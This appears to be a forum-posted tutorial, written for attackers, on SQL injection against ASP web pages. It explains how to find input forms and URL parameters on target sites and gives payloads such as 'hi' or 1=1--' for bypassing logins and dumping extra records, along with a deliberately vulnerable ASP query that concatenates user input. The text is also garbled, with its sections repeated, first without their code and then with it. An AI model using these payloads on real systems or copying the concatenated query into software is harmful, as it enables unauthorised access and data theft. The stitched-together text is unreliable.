1.1 What is SQL Injection?It is a trick to inject SQL query/command as an input possibly via web pages. Many web pages take parameters from web user, and make SQL query to the database. Take for instance when a user login, web page that user name and password and make SQL query to the database to check if a user has valid name and password. With SQL Injection, it is possible for us to send crafted user name and/or password field that will change the SQL query and thus grant us something else.
1.2 What do you need?Any web browser.
2.0 What you should look for?Try to look for pages that allow you to submit data, i.e: login page, search page, feedback, etc. Sometimes, HTML pages use POST command to send parameters to another ASP page. Therefore, you may not see the parameters in the URL. However, you can check the source code of the HTML, and look for "FORM" tag in the HTML code. You may find something like this in some HTML codes:
2.1 What if you can't find any page that takes input?You should look for pages like ASP, JSP, CGI, or PHP web pages. Try to look especially for URL that takes parameters,
like:
3.1 But why ' or 1=1--?Let us look at another example why ' or 1=1-- is important. Other than bypassing login, it is also possible to view extra information that is not normally available. Take an asp page that will link you to another page with the following URL:http://duck/index.asp?category=food In the URL, 'category' is the variable name, and 'food' is the value assigned to the variable. In order to do that, an ASP might contain the following code (OK, this is the actual code that was created for this exercise):
Tutorial Will Continue
1.2 What do you need?Any web browser.
2.0 What you should look for?Try to look for pages that allow you to submit data, i.e: login page, search page, feedback, etc. Sometimes, HTML pages use POST command to send parameters to another ASP page. Therefore, you may not see the parameters in the URL. However, you can check the source code of the HTML, and look for "FORM" tag in the HTML code. You may find something like this in some HTML codes:
- Code:
<FORM action=Search/search.asp method=post><input type=hidden name=A value=C></FORM>
2.1 What if you can't find any page that takes input?You should look for pages like ASP, JSP, CGI, or PHP web pages. Try to look especially for URL that takes parameters,
like:
- Code:
http://duck/index.asp?id=10
- Code:
hi' or 1=1--
- Code:
Login: hi' or 1=1-- - Pass: hi' or 1=1-- - http://duck/index.asp?id=hi' or 1=1--
- Code:
<FORM action=http://duck/Search/search.asp method=post><input type=hidden name=A value="hi' or 1=1--"></FORM>
3.1 But why ' or 1=1--?Let us look at another example why ' or 1=1-- is important. Other than bypassing login, it is also possible to view extra information that is not normally available. Take an asp page that will link you to another page with the following URL:http://duck/index.asp?category=food In the URL, 'category' is the variable name, and 'food' is the value assigned to the variable. In order to do that, an ASP might contain the following code (OK, this is the actual code that was created for this exercise):
- Code:
v_cat = request("category")sqlstr="SELECT * FROM product WHERE PCategory='" & v_cat & "'"set rs=conn.execute(sqlstr)
- Code:
SELECT * FROM product WHERE PCategory='food'
- Code:
http://duck/index.asp?category=food' or 1=1--
- Code:
SELECT * FROM product WHERE PCategory='food' or 1=1--'
- Code:
SELECT * FROM product WHERE PCategory='food' or 'a'='a'
Tutorial Will Continue